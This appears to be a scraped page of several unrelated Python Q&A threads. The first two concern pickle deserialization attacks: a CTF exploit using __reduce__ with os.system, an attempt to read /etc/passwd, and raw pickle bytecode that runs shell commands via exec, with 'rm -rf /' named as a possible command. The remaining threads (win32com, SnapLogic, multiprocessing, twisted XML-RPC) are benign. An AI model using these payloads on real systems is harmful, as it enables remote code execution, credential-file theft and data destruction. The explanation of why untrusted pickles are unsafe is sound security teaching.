Im trying to perform a cPickle deserialization for a CTF. Im working on an exploit for a deserialization vuln, trying to generate a python class that will run a command on a server when deserialized, following this example: https://lincolnloop.com/blog/playing-pickle-security/
import os
import cPickle
# Exploit that we want the target to unpickle
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
shellcode = cPickle.dumps(Exploit())
print shellcode
The thing is that the server I'm trying to exploit doesn't have the "os" or the "subprocess" modules included, so I'm not able to run shell commands. I'm trying to read local files with objects generated with the following code:
class Exploit(object):
def __reduce__(self):
data = open("/etc/passwd", "rb").read()
return data
shellcode = cPickle.dumps(Exploit()) print shellcode
but when i try to run it to generate the payload, it tries to read my local /etc/passwd file and fails with the error message:
shellcode = cPickle.dumps(Exploit())
cPickle.PicklingError: Can't pickle <main.Exploit object at
0x7f14ef4b39d0>: attribute lookup main.root:x:0:0:root:/root:/b
in/sh (/etc/passwd continues)
When I run the first example, it generates the following pickle succesfully (and doesnt try to do an ls on my machine):
cposix
system
p1
(S'ls'
p2
tp3
Rp4
.
So why is it not working with my code?
"Whenever you try to pickle an object, there will be some properties that may not serialize well. For instance, an open file handle In this cases, pickle won't know how to handle the object and will throw an error."
What's the exact usage of __reduce__ in Pickler
Related
I'm writing a simple email filter to work upon Outlook incoming messages on Windows 10, and seek to code it up in Python using the win32com library, under Anaconda. I also seek to avoid using magic numbers for the "Inbox" as I see in other examples, and would rather use constants that should be defined under win32com.client.constants. But I'm running into simple errors that are surprising:
So, I concocted the following simple code, loosely based upon https://stackoverflow.com/a/65800130/257924 :
import sys
import win32com.client
try:
outlookApp = win32com.client.Dispatch("Outlook.Application")
except:
print("ERROR: Unable to load Outlook")
sys.exit(1)
outlook = outlookApp.GetNamespace("MAPI")
ofContacts = outlook.GetDefaultFolder(win32com.client.constants.olFolderContacts)
print("ofContacts", type(ofContacts))
sys.exit(0)
Running that under an Anaconda-based installer (Anaconda3 2022.10 (Python 3.9.13 64-bit)) on Windows 10 errors out with:
(base) c:\Temp>python testing.py
Traceback (most recent call last):
File "c:\Temp\testing.py", line 11, in <module>
ofContacts = outlook.GetDefaultFolder(win32com.client.constants.olFolderContacts)
File "C:\Users\brentg\Anaconda3\lib\site-packages\win32com\client\__init__.py", line 231, in __getattr__
raise AttributeError(a)
AttributeError: olFolderContacts
Further debugging indicates that the __dicts__ property is referenced by the __init__.py in the error message above. See excerpt of that class below. For some reason, that __dicts__ is an empty list:
class Constants:
"""A container for generated COM constants."""
def __init__(self):
self.__dicts__ = [] # A list of dictionaries
def __getattr__(self, a):
for d in self.__dicts__:
if a in d:
return d[a]
raise AttributeError(a)
# And create an instance.
constants = Constants()
What is required to have win32com properly initialize that constants object?
The timestamps on the init.py file show 10/10/2021 in case that is relevant.
The short answer is to change:
outlookApp = win32com.client.Dispatch("Outlook.Application")
to
outlookApp = win32com.client.gencache.EnsureDispatch("Outlook.Application")
The longer answer is that win32com can work with COM interfaces in one of two ways: late- and early-binding.
With late-binding, your code knows nothing about the Dispatch interface ie. doesn't know which methods, properties or constants are available. When you call a method on the Dispatch interface, win32com doesn't know if that method exists or any parameters: it just sends what it is given and hopes for the best!
With early-binding, your code relies on previously-captured information about the Dispatch interface, taken from its Type Library. This information is used to create local Python wrappers for the interface which know all the methods and their parameters. At the same time it populates the Constants dictionary with any constants/enums contained in the Type Library.
win32com has a catch-all win32com.client.Dispatch() function which will try to use early-binding if the local wrapper files are present, otherwise will fall back to using late-binding. My problem with the package is that the caller doesn't always know what they are getting, as in the OP's case.
The alternative win32com.client.gencache.EnsureDispatch() function enforces early-binding and ensures any constants are available. If the local wrapper files are not available, they will be created (you might find them under %LOCALAPPDATA%\Temp\gen_py\xx\CLSID where xx is the Python version number, and CLSID is the GUID for the Type Library). Once these wrappers are created once then the generic win32com.client.Dispatch() will use these files.
From the python docs for pickle :
Warning The pickle module is not secure. Only unpickle data you trust.
What would be an example of pickling and then un-pickling data that would do something malicious? I've only ever used pickle to save objects that don't necessarily json encode well (date, decimal, etc.) so I don't have much experience with it or what it's capable outside of being a "simpler json" encoder.
What would be an example of something malicious that could be done with it?
Like Chase said, functions can be executed by unpickling. According to this source: https://intoli.com/blog/dangerous-pickles/, pickled objects are actually stored as bytecode instructions which are interpreted on opening (similar to Python itself). By writing pickle bytecode, it's possible to make a pickle "program" to do anything.
Here I made a pickle program to run the bash command say "malicious code", but you could run commands like rm -rf / as well.
I saved the following bytecode to a file:
c__builtin__
exec
(Vimport os; os.system('say "malicious code"')
tR.
and then unpickled it with:
import pickle
loadfile = open('malicious', 'rb')
data = pickle.load(loadfile)
I immediately heard some "malicious code".
I have a simple SQL file that I'd like to read and execute using a Python Script Snap in SnapLogic. I created an expression library file to reference the Redshift account and have included it as a parameter in the pipeline.
I have the code below from another post. Is there a way to reference the pipeline parameter to connect to the Redshift database, read the uploaded SQL file and execute the commands?
fd = open('shared/PythonExecuteTest.sql', 'r')
sqlFile = fd.read()
fd.close()
sqlCommands = sqlFile.split(';')
for command in sqlCommands:
try:
c.execute(command)
except OperationalError, msg:
print "Command skipped: ", msg
You can access pipeline parameters in scripts using $_.
Let's say, you have a pipeline parameter executionId. Then to access it in the script you can do $_executionId.
Following is a test pipeline.
With the following pipeline parameter.
Following is the test data.
Following is the script
# Import the interface required by the Script snap.
from com.snaplogic.scripting.language import ScriptHook
import java.util
class TransformScript(ScriptHook):
def __init__(self, input, output, error, log):
self.input = input
self.output = output
self.error = error
self.log = log
# The "execute()" method is called once when the pipeline is started
# and allowed to process its inputs or just send data to its outputs.
def execute(self):
self.log.info("Executing Transform script")
while self.input.hasNext():
try:
# Read the next document, wrap it in a map and write out the wrapper
in_doc = self.input.next()
wrapper = java.util.HashMap()
wrapper['output'] = in_doc
wrapper['output']['executionId'] = $_executionId
self.output.write(in_doc, wrapper)
except Exception as e:
errWrapper = {
'errMsg' : str(e.args)
}
self.log.error("Error in python script")
self.error.write(errWrapper)
self.log.info("Finished executing the Transform script")
# The Script Snap will look for a ScriptHook object in the "hook"
# variable. The snap will then call the hook's "execute" method.
hook = TransformScript(input, output, error, log)
Output:
Here, you can see that the executionId was read from the pipeline parameters.
Note: Accessing pipeline parameters from scripts is a valid scenario but accessing other external systems from the script is complicated (because you would need to load the required libraries) and not recommended. Use the snaps provided by SnapLogic to access external systems. Also, if you want to use other libraries inside scripts, try sticking to Javascript instead of going to python because there are a lot of open source CDNs that you can use in your scripts.
Also, you can't access any configured expression library directly from the script. If you need some logic in the script, you would keep it in the script and not somewhere else. And, there is no point in accessing account names in the script (or mappers) because, even if you know the account name, you can't use the credentials/configurations stored in that account directly; that is handled by SnapLogic. Use the provided snaps and mappers as much as possible.
Update #1
You can't access the account directly. Accounts are managed and used internally by the snaps. You can only create and set accounts through the accounts tab of the relevant snap.
Avoid using script snap as much as possible; especially, if you can do the same thing using normal snaps.
Update #2
The simplest solution to this requirement would be as follows.
Read the file using a file reader
Split based on ;
Execute each SQL command using the Generic JDBC Execute Snap
I would like to use multiprocess package for example in this code.
I've tried to call the function create_new_population and distribute the data to 8 processors, but when I do I get pickle error.
Normally the function would run like this: self.create_new_population(self.pop_size)
I try to distribute the work like this:
f= self.create_new_population
pop = self.pop_size/8
self.current_generation = [pool.apply_async(f, pop) for _ in range(8)]
I get Can't pickle local object 'exhaust.__init__.<locals>.tour_select'
or PermissionError: [WinError 5] Access is denied
I've read this thread carefully and also tried to bypass the error using an approach from Steven Bethard to allow method pickling/unpickling via copyreg:
def _pickle_method(method)
def _unpickle_method(func_name, obj, cls)
I also tried to use pathos package without any luck.
I've know that the code should be called under if __name__ == '__main__': block, but I would like to know if this can be done with minimum possible changes in the code.
I'm trying to set up a twisted xmlrpc server, which will accept files from a client, process them, and return a file and result dictionary back.
I've used python before, but never the twisted libraries. For my purposes security is a non issue, and the ssh protocol seems like overkill. It also has problems on the windows server, since termios is not available.
So all of my research points to xmlrpc being the best way to accomplish this. However, there are two methods of file transfer available. Using the xml binary data method, or the http request method.
Files can be up to a few hundred megs either way, so which method should I use? Sample code is appreciated, since I could find no documentation for file transfers over xml with twisted.
Update:
So it seems that serializing the file with xmlrpclib.Binary does not work for large files, or I'm using it wrong. Test code below:
from twisted.web import xmlrpc, server
class Example(xmlrpc.XMLRPC):
"""
An example object to be published.
"""
def xmlrpc_echo(self, x):
"""
Return all passed args.
"""
return x
def xmlrpc_add(self, a, b):
"""
Return sum of arguments.
"""
return a + b
def xmlrpc_fault(self):
"""
Raise a Fault indicating that the procedure should not be used.
"""
raise xmlrpc.Fault(123, "The fault procedure is faulty.")
def xmlrpc_write(self, f, location):
with open(location, 'wb') as fd:
fd.write(f.data)
if __name__ == '__main__':
from twisted.internet import reactor
r = Example(allowNone=True)
reactor.listenTCP(7080, server.Site(r))
reactor.run()
And the client code:
import xmlrpclib
s = xmlrpclib.Server('http://localhost:7080/')
with open('test.pdf', 'rb') as fd:
f = xmlrpclib.Binary(fd.read())
s.write(f, 'output.pdf')
I get xmlrpclib.Fault: <Fault 8002: "Can't deserialize input: "> when I test this. Is it because the file is a pdf?
XML-RPC is a poor choice for file transfers. XML-RPC requires the file content to be encoded in a way that XML supports. This is expensive in both runtime costs and network resources. Instead, try just POSTing or PUTing the file using plain old HTTP.